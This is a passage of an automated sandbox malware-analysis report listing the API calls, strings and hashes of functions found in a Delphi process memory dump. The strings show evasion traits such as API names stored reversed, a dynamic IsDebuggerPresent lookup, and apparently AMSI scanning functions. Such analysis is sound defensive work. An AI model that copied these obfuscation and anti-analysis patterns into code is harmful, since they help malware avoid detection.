                                                                                              • IsBadReadPtr.KERNEL32(?,00000002), ref: 031DB0B7
                                                                                              • IsBadReadPtr.KERNEL32(?,00000014), ref: 031DB0CB
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.1725304888.00000000031C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 031C0000, based on PE: true
                                                                                              • Associated: 00000003.00000002.1725278060.00000000031C0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1725659576.00000000031EE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1726510733.0000000003247000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1726510733.000000000333B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1726510733.000000000333E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_31c0000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: Read$HandleModule
                                                                                              • String ID: KernelBase$LoadLibraryExA
                                                                                              • API String ID: 2226866862-113032527
                                                                                              • Opcode ID: ef5f4eca0ef2e29f5789144f4887a7b4cb2d117f650fa4bedd15a44042c63058
                                                                                              • Instruction ID: 96897d65a14adc6e6b277c2e55f7bb141efbde0337b8ae7b936b206bbc454093
                                                                                              • Opcode Fuzzy Hash: ef5f4eca0ef2e29f5789144f4887a7b4cb2d117f650fa4bedd15a44042c63058
                                                                                              • Instruction Fuzzy Hash: 34317475A08305BBDF20DB69DC85F5A77BCAF0E354F058154FA25AB2C1D730A940C7A0
                                                                                              Function 031C435C Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 38filewindowCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001E,?,00000000,?,031C4423,?,?,032467C8,?,?,031EE7A8,031C65B1,031ED30D), ref: 031C4395
                                                                                              • WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,031C4423,?,?,032467C8,?,?,031EE7A8,031C65B1,031ED30D), ref: 031C439B
                                                                                              • GetStdHandle.KERNEL32(000000F5,031C43E4,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,031C4423,?,?,032467C8), ref: 031C43B0
                                                                                              • WriteFile.KERNEL32(00000000,000000F5,031C43E4,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,031C4423,?,?), ref: 031C43B6
                                                                                              • MessageBoxA.USER32(00000000,Runtime error at 00000000,Error,00000000), ref: 031C43D4
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.1725304888.00000000031C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 031C0000, based on PE: true
                                                                                              • Associated: 00000003.00000002.1725278060.00000000031C0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1725659576.00000000031EE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1726510733.0000000003247000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1726510733.000000000333B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1726510733.000000000333E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_31c0000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: FileHandleWrite$Message
                                                                                              • String ID: Error$Runtime error at 00000000
                                                                                              • API String ID: 1570097196-2970929446
                                                                                              • Opcode ID: 6ad9b2753904523e4c67fc0882918b41aec758fc2002581f9357136876647e0c
                                                                                              • Instruction ID: d35eec6592a6fb2de844444dc98b3e0631cf9a22e8d3288c1546742383d59347
                                                                                              • Opcode Fuzzy Hash: 6ad9b2753904523e4c67fc0882918b41aec758fc2002581f9357136876647e0c
                                                                                              • Instruction Fuzzy Hash: B4F09669AE83D47FF711F2B16C5AF59265C57ACB26F54421DB2205C0C68BA880C4D372
                                                                                              Function 031CAEC4 Relevance: 10.6, APIs: 7, Instructions: 56filewindowCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 031CAD3C: VirtualQuery.KERNEL32(?,?,0000001C), ref: 031CAD59
                                                                                                • Part of subcall function 031CAD3C: GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 031CAD7D
                                                                                                • Part of subcall function 031CAD3C: GetModuleFileNameA.KERNEL32(031C0000,?,00000105), ref: 031CAD98
                                                                                                • Part of subcall function 031CAD3C: LoadStringA.USER32(00000000,0000FFE9,?,00000100), ref: 031CAE2E
                                                                                              • CharToOemA.USER32(?,?), ref: 031CAEFB
                                                                                              • GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000,?,?), ref: 031CAF18
                                                                                              • WriteFile.KERNEL32(00000000,000000F4,?,00000000,?,00000000,?,?), ref: 031CAF1E
                                                                                              • GetStdHandle.KERNEL32(000000F4,031CAF88,00000002,?,00000000,00000000,000000F4,?,00000000,?,00000000,?,?), ref: 031CAF33
                                                                                              • WriteFile.KERNEL32(00000000,000000F4,031CAF88,00000002,?,00000000,00000000,000000F4,?,00000000,?,00000000,?,?), ref: 031CAF39
                                                                                              • LoadStringA.USER32(00000000,0000FFEA,?,00000040), ref: 031CAF5B
                                                                                              • MessageBoxA.USER32(00000000,?,?,00002010), ref: 031CAF71
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.1725304888.00000000031C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 031C0000, based on PE: true
                                                                                              • Associated: 00000003.00000002.1725278060.00000000031C0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1725659576.00000000031EE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1726510733.0000000003247000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1726510733.000000000333B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1726510733.000000000333E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_31c0000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: File$HandleLoadModuleNameStringWrite$CharMessageQueryVirtual
                                                                                              • String ID:
                                                                                              • API String ID: 185507032-0
                                                                                              • Opcode ID: 62789e227a759f7b639bb31cf62b78413e281dc4d5281186ff23fa9ebf5d9b78
                                                                                              • Instruction ID: eaf89982b41f726b99e482089291aeb992c34e85c611bd45a1419c429bc9eada
                                                                                              • Opcode Fuzzy Hash: 62789e227a759f7b639bb31cf62b78413e281dc4d5281186ff23fa9ebf5d9b78
                                                                                              • Instruction Fuzzy Hash: 4E119ABA124384BFD301F7A4DC85F9F77ACAF29A00F444929B744DA0E0DB74E8008762
                                                                                              Function 031CE58C Relevance: 9.1, APIs: 6, Instructions: 139COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 031CE625
                                                                                              • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 031CE641
                                                                                              • SafeArrayCreate.OLEAUT32(0000000C,?,?), ref: 031CE67A
                                                                                              • SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 031CE6F7
                                                                                              • SafeArrayPtrOfIndex.OLEAUT32(00000000,?,?), ref: 031CE710
                                                                                              • VariantCopy.OLEAUT32(?,00000000), ref: 031CE745
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.1725304888.00000000031C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 031C0000, based on PE: true
                                                                                              • Associated: 00000003.00000002.1725278060.00000000031C0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1725659576.00000000031EE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1726510733.0000000003247000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1726510733.000000000333B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1726510733.000000000333E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_31c0000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: ArraySafe$BoundIndex$CopyCreateVariant
                                                                                              • String ID:
                                                                                              • API String ID: 351091851-0
                                                                                              • Opcode ID: a9a696700a5c398af6b49de9a61da99d4f96f00f59c5a2cf8b5ab96da2f16d4b
                                                                                              • Instruction ID: ff0c040ec4677f3c7ee7ed3da34690aa9a90fa5578322e9f621cad934b7a4aef
                                                                                              • Opcode Fuzzy Hash: a9a696700a5c398af6b49de9a61da99d4f96f00f59c5a2cf8b5ab96da2f16d4b
                                                                                              • Instruction Fuzzy Hash: 5551FF7992166D9BCB26DB58CC90BD9B3BCAF5C301F0441D9E509EB211D730AF858FA1
                                                                                              Function 031C3598 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 49registryCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 031C35BA
                                                                                              • RegQueryValueExA.ADVAPI32(?,FPUMaskValue,00000000,00000000,?,00000004,00000000,031C3609,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 031C35ED
                                                                                              • RegCloseKey.ADVAPI32(?,031C3610,00000000,?,00000004,00000000,031C3609,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 031C3603
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.1725304888.00000000031C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 031C0000, based on PE: true
                                                                                              • Associated: 00000003.00000002.1725278060.00000000031C0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1725659576.00000000031EE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1726510733.0000000003247000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1726510733.000000000333B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1726510733.000000000333E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_31c0000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: CloseOpenQueryValue
                                                                                              • String ID: FPUMaskValue$SOFTWARE\Borland\Delphi\RTL
                                                                                              • API String ID: 3677997916-4173385793
                                                                                              • Opcode ID: c283b4d40622388525c702a8846f5db66556650ad6a1723d553a02c1a4a954c8
                                                                                              • Instruction ID: 0e307755ca225827f24d4070549aed222efe3f92ea02623f6185eedab928345f
                                                                                              • Opcode Fuzzy Hash: c283b4d40622388525c702a8846f5db66556650ad6a1723d553a02c1a4a954c8
                                                                                              • Instruction Fuzzy Hash: 5201F57DA60398BFDB10EBD08C02BBD73ECD71CB11F104469BA10DA681E378A610D668
                                                                                              Function 031D8274 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 44libraryloaderCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,031D82FC,?,?,00000000,00000000,?,031D8215,00000000,KernelBASE,00000000,00000000,031D823C), ref: 031D82C1
                                                                                              • GetProcAddress.KERNEL32(00000000,Kernel32), ref: 031D82C7
                                                                                              • GetProcAddress.KERNEL32(?,?), ref: 031D82D9
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.1725304888.00000000031C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 031C0000, based on PE: true
                                                                                              • Associated: 00000003.00000002.1725278060.00000000031C0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1725659576.00000000031EE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1726510733.0000000003247000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1726510733.000000000333B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1726510733.000000000333E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_31c0000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: AddressProc$HandleModule
                                                                                              • String ID: Kernel32$sserddAcorPteG
                                                                                              • API String ID: 667068680-1372893251
                                                                                              • Opcode ID: b1817bec6a20900413a2db85fed9eb7cda29a523e4ef49f727b5d023101f449c
                                                                                              • Instruction ID: 47ae24749148bd6b6ec6fd7395825da08839505174e355ad501800e4560fef26
                                                                                              • Opcode Fuzzy Hash: b1817bec6a20900413a2db85fed9eb7cda29a523e4ef49f727b5d023101f449c
                                                                                              • Instruction Fuzzy Hash: 4D01A27C614348BFDB15EFA9EC51E9DBBBDEB4DE00F518464B814DB601EB30A900C624
                                                                                              Function 031CAA50 Relevance: 7.6, APIs: 5, Instructions: 50threadCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetThreadLocale.KERNEL32(?,00000000,031CAAE7,?,?,00000000), ref: 031CAA68
                                                                                                • Part of subcall function 031CA7C4: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 031CA7E2
                                                                                              • GetThreadLocale.KERNEL32(00000000,00000004,00000000,031CAAE7,?,?,00000000), ref: 031CAA98
                                                                                              • EnumCalendarInfoA.KERNEL32(Function_0000A99C,00000000,00000000,00000004), ref: 031CAAA3
                                                                                              • GetThreadLocale.KERNEL32(00000000,00000003,00000000,031CAAE7,?,?,00000000), ref: 031CAAC1
                                                                                              • EnumCalendarInfoA.KERNEL32(Function_0000A9D8,00000000,00000000,00000003), ref: 031CAACC
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.1725304888.00000000031C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 031C0000, based on PE: true
                                                                                              • Associated: 00000003.00000002.1725278060.00000000031C0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1725659576.00000000031EE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1726510733.0000000003247000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1726510733.000000000333B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1726510733.000000000333E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_31c0000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: Locale$InfoThread$CalendarEnum
                                                                                              • String ID:
                                                                                              • API String ID: 4102113445-0
                                                                                              • Opcode ID: 1cd5196df913057144816cde41c7966ec64f6d957e76752753a2f5674cfdd34f
                                                                                              • Instruction ID: e867317558dbbaa6b39acb5929a56157743ecd092e9f0ed4b80503365e28be84
                                                                                              • Opcode Fuzzy Hash: 1cd5196df913057144816cde41c7966ec64f6d957e76752753a2f5674cfdd34f
                                                                                              • Instruction Fuzzy Hash: 4401F2B86303CC7FE713EA74CD12B6E726CDFAEB14F510568E510AA6C1DB65DE008269
                                                                                              Function 031CAB00 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 148threadCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetThreadLocale.KERNEL32(?,00000000,031CACD0,?,?,?,?,00000000,00000000,00000000,00000000,00000000), ref: 031CAB2F
                                                                                                • Part of subcall function 031CA7C4: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 031CA7E2
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.1725304888.00000000031C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 031C0000, based on PE: true
                                                                                              • Associated: 00000003.00000002.1725278060.00000000031C0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1725659576.00000000031EE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1726510733.0000000003247000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1726510733.000000000333B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1726510733.000000000333E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_31c0000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: Locale$InfoThread
                                                                                              • String ID: eeee$ggg$yyyy
                                                                                              • API String ID: 4232894706-1253427255
                                                                                              • Opcode ID: bddf9f1d572199473bdf5fd1bcab033efa76364a5c1a56d44a12602cef106d70
                                                                                              • Instruction ID: 790036cac0035c28d34fd56edf72719d0a65de63b3946728805f404efaf198db
                                                                                              • Opcode Fuzzy Hash: bddf9f1d572199473bdf5fd1bcab033efa76364a5c1a56d44a12602cef106d70
                                                                                              • Instruction Fuzzy Hash: 1141D0686383CC4BD717EBBD88A12BEB2AADFBD100B15416DD452CB344DB249D028269
                                                                                              Function 031D81CC Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 36COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,031D823C,?,?,00000000,?,031D7A7E,ntdll,00000000,00000000,031D7AC3,?,?,00000000), ref: 031D820A
                                                                                                • Part of subcall function 031D8274: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,031D82FC,?,?,00000000,00000000,?,031D8215,00000000,KernelBASE,00000000,00000000,031D823C), ref: 031D82C1
                                                                                                • Part of subcall function 031D8274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 031D82C7
                                                                                                • Part of subcall function 031D8274: GetProcAddress.KERNEL32(?,?), ref: 031D82D9
                                                                                              • GetModuleHandleA.KERNELBASE(?), ref: 031D821E
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.1725304888.00000000031C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 031C0000, based on PE: true
                                                                                              • Associated: 00000003.00000002.1725278060.00000000031C0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1725659576.00000000031EE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1726510733.0000000003247000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1726510733.000000000333B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1726510733.000000000333E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_31c0000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: HandleModule$AddressProc
                                                                                              • String ID: AeldnaHeludoMteG$KernelBASE
                                                                                              • API String ID: 1883125708-1952140341
                                                                                              • Opcode ID: 7e3d4326eeb398ac620edaa5cd3e4277e1ce93b99f6db3d643f8254e9f6da7d9
                                                                                              • Instruction ID: 00f80d92845e2a3ed2408915c848f32e444c660fd83d13a5e3bdcf2c5eff272d
                                                                                              • Opcode Fuzzy Hash: 7e3d4326eeb398ac620edaa5cd3e4277e1ce93b99f6db3d643f8254e9f6da7d9
                                                                                              • Instruction Fuzzy Hash: D0F09078618B44AFCB01FFA9EC15D5DBBECEB4FA00B518465B820DB611EB30AE00C665
                                                                                              Function 031DF6E8 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 19libraryloaderCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetModuleHandleW.KERNEL32(KernelBase,?,031DFAEB,UacInitialize,03247380,031EB7B8,OpenSession,03247380,031EB7B8,ScanBuffer,03247380,031EB7B8,ScanString,03247380,031EB7B8,Initialize), ref: 031DF6EE
                                                                                              • GetProcAddress.KERNEL32(00000000,IsDebuggerPresent), ref: 031DF700
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.1725304888.00000000031C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 031C0000, based on PE: true
                                                                                              • Associated: 00000003.00000002.1725278060.00000000031C0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1725659576.00000000031EE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1726510733.0000000003247000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1726510733.000000000333B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1726510733.000000000333E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_31c0000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: AddressHandleModuleProc
                                                                                              • String ID: IsDebuggerPresent$KernelBase
                                                                                              • API String ID: 1646373207-2367923768
                                                                                              • Opcode ID: a07b5f5912d50953bf4ce72de5eeec884444ccb16f0a02fe56b587b4ab123132
                                                                                              • Instruction ID: fca1305eb2e98d131c85e23d6683f02cd74bf494c8ab80242e7e1b4ccd6ff4f2
                                                                                              • Opcode Fuzzy Hash: a07b5f5912d50953bf4ce72de5eeec884444ccb16f0a02fe56b587b4ab123132
                                                                                              • Instruction Fuzzy Hash: AFD012E63603A02FDE00F2F82CC589D0288896E42E3282F20B033CA093E7A68A1B5114
                                                                                              Function 031CC474 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 16libraryloaderCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetModuleHandleA.KERNEL32(kernel32.dll,?,031ED10B,00000000,031ED11E), ref: 031CC47A
                                                                                              • GetProcAddress.KERNEL32(00000000,GetDiskFreeSpaceExA), ref: 031CC48B
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.1725304888.00000000031C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 031C0000, based on PE: true
                                                                                              • Associated: 00000003.00000002.1725278060.00000000031C0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1725659576.00000000031EE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1726510733.0000000003247000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1726510733.000000000333B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1726510733.000000000333E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_31c0000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: AddressHandleModuleProc
                                                                                              • String ID: GetDiskFreeSpaceExA$kernel32.dll
                                                                                              • API String ID: 1646373207-3712701948
                                                                                              • Opcode ID: b1c462538387a35b264945284a4bc0f097213a1b218a4bdc51c5cb18e794e830
                                                                                              • Instruction ID: 44dc0a25614216279447aca8a980a9a62cc73a22123613e048c6fb41c82a1d91
                                                                                              • Opcode Fuzzy Hash: b1c462538387a35b264945284a4bc0f097213a1b218a4bdc51c5cb18e794e830
                                                                                              • Instruction Fuzzy Hash: 7AD05EB06203D45FD600FAF55481AB52198873CB11B08C02DF4265D101E7A75C418FF4
                                                                                              Function 031CE1E8 Relevance: 6.1, APIs: 4, Instructions: 115COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 031CE297
                                                                                              • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 031CE2B3
                                                                                              • SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 031CE32A
                                                                                              • VariantClear.OLEAUT32(?), ref: 031CE353
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.1725304888.00000000031C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 031C0000, based on PE: true
                                                                                              • Associated: 00000003.00000002.1725278060.00000000031C0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1725659576.00000000031EE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1726510733.0000000003247000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1726510733.000000000333B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1726510733.000000000333E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_31c0000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: ArraySafe$Bound$ClearIndexVariant
                                                                                              • String ID:
                                                                                              • API String ID: 920484758-0
                                                                                              • Opcode ID: cd7e56306b14da739c94dd26db2064fb48e8dac8868798fc3541503821c87934
                                                                                              • Instruction ID: 7cba35b264a240d0436a116bebb789cc463737a3b39c1037891bcc72e12fd266
                                                                                              • Opcode Fuzzy Hash: cd7e56306b14da739c94dd26db2064fb48e8dac8868798fc3541503821c87934
                                                                                              • Instruction Fuzzy Hash: DF411A79A117699FCB62DB58CC90BC9B3BCAF5C601F0441D9E549AB211DB30AF81CF60
                                                                                              Function 031CAD3C Relevance: 6.1, APIs: 4, Instructions: 102COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • VirtualQuery.KERNEL32(?,?,0000001C), ref: 031CAD59
                                                                                              • GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 031CAD7D
                                                                                              • GetModuleFileNameA.KERNEL32(031C0000,?,00000105), ref: 031CAD98
                                                                                              • LoadStringA.USER32(00000000,0000FFE9,?,00000100), ref: 031CAE2E
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.1725304888.00000000031C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 031C0000, based on PE: true
                                                                                              • Associated: 00000003.00000002.1725278060.00000000031C0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1725659576.00000000031EE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1726510733.0000000003247000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1726510733.000000000333B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1726510733.000000000333E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_31c0000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: FileModuleName$LoadQueryStringVirtual
                                                                                              • String ID:
                                                                                              • API String ID: 3990497365-0
                                                                                              • Opcode ID: f5e17a450822226f03ff111b17d8718baa58378a040384c05db7f727e830d0b4
                                                                                              • Instruction ID: 66a50d454771a5dae31adbfc33609bf683a675aff265da17a010d07d4b312f14
                                                                                              • Opcode Fuzzy Hash: f5e17a450822226f03ff111b17d8718baa58378a040384c05db7f727e830d0b4
                                                                                              • Instruction Fuzzy Hash: 65411F74A1039C9BDB21DB68DD84BDAB7FCAF2C200F4440E9A548EB245D7749F948F94
                                                                                              Function 031CAD3A Relevance: 6.1, APIs: 4, Instructions: 101COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • VirtualQuery.KERNEL32(?,?,0000001C), ref: 031CAD59
                                                                                              • GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 031CAD7D
                                                                                              • GetModuleFileNameA.KERNEL32(031C0000,?,00000105), ref: 031CAD98
                                                                                              • LoadStringA.USER32(00000000,0000FFE9,?,00000100), ref: 031CAE2E
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.1725304888.00000000031C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 031C0000, based on PE: true
                                                                                              • Associated: 00000003.00000002.1725278060.00000000031C0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1725659576.00000000031EE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1726510733.0000000003247000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1726510733.000000000333B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1726510733.000000000333E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_31c0000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: FileModuleName$LoadQueryStringVirtual
                                                                                              • String ID:
                                                                                              • API String ID: 3990497365-0
                                                                                              • Opcode ID: 19d051e35025ac9efe6da69b96030b0128dae1921998d4a1a8e6a5c68a141ade
